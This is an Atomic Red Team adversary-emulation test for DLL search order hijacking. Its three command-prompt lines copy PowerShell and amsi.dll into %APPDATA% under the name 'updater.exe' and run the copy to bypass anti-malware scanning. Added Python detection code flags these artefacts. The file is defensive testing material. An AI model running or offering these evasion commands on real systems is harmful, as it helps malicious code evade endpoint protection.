atomic-red-team/atomics/T1038/T1038.yaml
JimmyAstle e1f2936764 Update T1038 (#581)
Swapping out a /c for a /k so the test isn't blocking, since this is spawning a new powershell session.
2019-10-08 12:01:35 -06:00


---
attack_technique: T1038
display_name: DLL Search Order Hijacking
atomic_tests:
- name: DLL Search Order Hijacking - amsi.dll
  description: |
    Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version
    of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface)
    https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/
  supported_platforms:
  - windows
  executor:
    name: command_prompt
    elevation_required: false
    command: |
      copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe
      copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
      cmd.exe /k %APPDATA%\updater.exe
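The test above leaves two artefacts a defender can look for: a PowerShell host running under a name other than powershell.exe, and amsi.dll loaded from a directory other than System32/SysWOW64. The following detection logic is an added example, not code from the atomic-red-team project; it assumes Sysmon-style field names (Image, ImageLoaded, OriginalFileName for event IDs 1 and 7), constructed sample records, and %windir% resolving to C:\Windows.

```python
# Added example, not code from the atomic-red-team project. Flags the two
# artefacts this test leaves in Sysmon-style records: a PowerShell host running
# under another file name (event ID 1) and amsi.dll loaded from a directory other
# than System32/SysWOW64 (event ID 7). Field names follow Sysmon; the records
# below are constructed, and %windir% is assumed to be C:\Windows.
from pathlib import PureWindowsPath

TRUSTED_AMSI_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

def amsi_loaded_from_untrusted_dir(record):
    """True if ImageLoaded is an amsi.dll outside the two trusted system directories."""
    loaded = PureWindowsPath(record.get("ImageLoaded", ""))
    if loaded.name.lower() != "amsi.dll":
        return False
    return str(loaded.parent).lower() not in TRUSTED_AMSI_DIRS

def renamed_powershell(record):
    """True if the PE's OriginalFileName is PowerShell.EXE but the on-disk name differs."""
    original = record.get("OriginalFileName", "").lower()
    on_disk = PureWindowsPath(record.get("Image", "")).name.lower()
    return original == "powershell.exe" and on_disk != original

def find_hijack_indicators(records):
    """One finding per suspicious record, in input order."""
    findings = []
    for r in records:
        if r.get("EventID") == 1 and renamed_powershell(r):
            findings.append("renamed PowerShell host: " + r["Image"])
        elif r.get("EventID") == 7 and amsi_loaded_from_untrusted_dir(r):
            findings.append("amsi.dll loaded from untrusted path: " + r["ImageLoaded"])
    return findings

# Constructed records: a normal PowerShell start, then the copies made by the test above.
SAMPLE_RECORDS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE"},
    {"EventID": 7, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ImageLoaded": r"C:\Windows\System32\amsi.dll"},
    {"EventID": 1, "Image": r"C:\Users\alice\AppData\Roaming\updater.exe",
     "OriginalFileName": "PowerShell.EXE"},
    {"EventID": 7, "Image": r"C:\Users\alice\AppData\Roaming\updater.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Roaming\amsi.dll"},
]

if __name__ == "__main__":
    for finding in find_hijack_indicators(SAMPLE_RECORDS):
        print(finding)
```

Only the two records produced by the copied binary are reported; the stock powershell.exe loading amsi.dll from System32 passes both checks.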